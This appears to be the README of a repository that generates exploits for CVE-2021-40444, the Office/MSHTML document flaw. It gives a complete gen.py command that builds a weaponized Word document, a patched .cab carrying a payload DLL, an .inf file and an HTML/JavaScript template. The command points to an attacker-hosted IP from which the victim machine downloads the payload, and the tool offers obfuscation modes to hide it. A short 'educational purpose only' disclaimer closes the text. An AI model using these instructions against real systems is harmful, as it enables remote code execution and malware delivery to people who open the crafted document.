CVE-2021-40444

Usage

Ensure to run script.sh first as you will need few directories. Once you have run the script, you should be able to run gen.py with the example given:-

# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3

# Flag
-d -> Our .docx file that already been modified with Bitmap Object whether in header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx 
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf 
-obf -> Extra : Comes with 3 mode (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity

Notes

The location of http.server will be in web directory. This directory will have 3 files:-

.cab
.html
.docx

Without Verbose

With Verbose

Disclaimer

This repository is for educational purpose only and not intended to be used in the wild for bad intention. Any illegal use of this repo is strictly at your own responsibilty and risk.